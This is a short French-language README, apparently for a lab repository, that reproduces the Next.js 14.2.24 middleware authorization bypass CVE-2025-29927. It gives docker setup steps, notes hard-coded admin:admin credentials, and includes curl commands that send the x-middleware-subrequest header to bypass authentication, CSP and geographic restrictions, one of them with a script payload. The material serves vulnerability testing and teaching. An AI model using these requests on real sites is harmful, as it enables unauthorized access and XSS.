
Reproduit le contournement de l'autorisation middleware CVE-2025-29927 dans Next.js 14.2.24 et démontre l'exploitation avec curl pour contourner l'authentification et les restrictions du middleware.
Une petite application Next.js simple exécutant la version 14.2.24 utilisée pour tester la CVE-2025-29927.
Accédez à la zone d'administration (/admin) en utilisant la vulnérabilité ou les identifiants codés en dur admin:admin.
» git clone [email protected]:0xPThree/next.js_cve-2025-29927.git
» docker build -t nextjs .
» docker run -d -p 3000:3000 --name nextjs nextjs
Outre le contournement d'authentification évident, cette vulnérabilité peut également :
# Middleware may be used to set CSP headers to prevent XSS. Bypass CSP to XSS:
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
-H "Content-Type: text/html" --data "<script>alert('1')</script>" \
http://exploit.se
# Middleware may be used to restrict content by geographic location. Bypass geographic restrictions:
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
-H "CF-IPCountry: SE" http://exploit.se/se-only-content
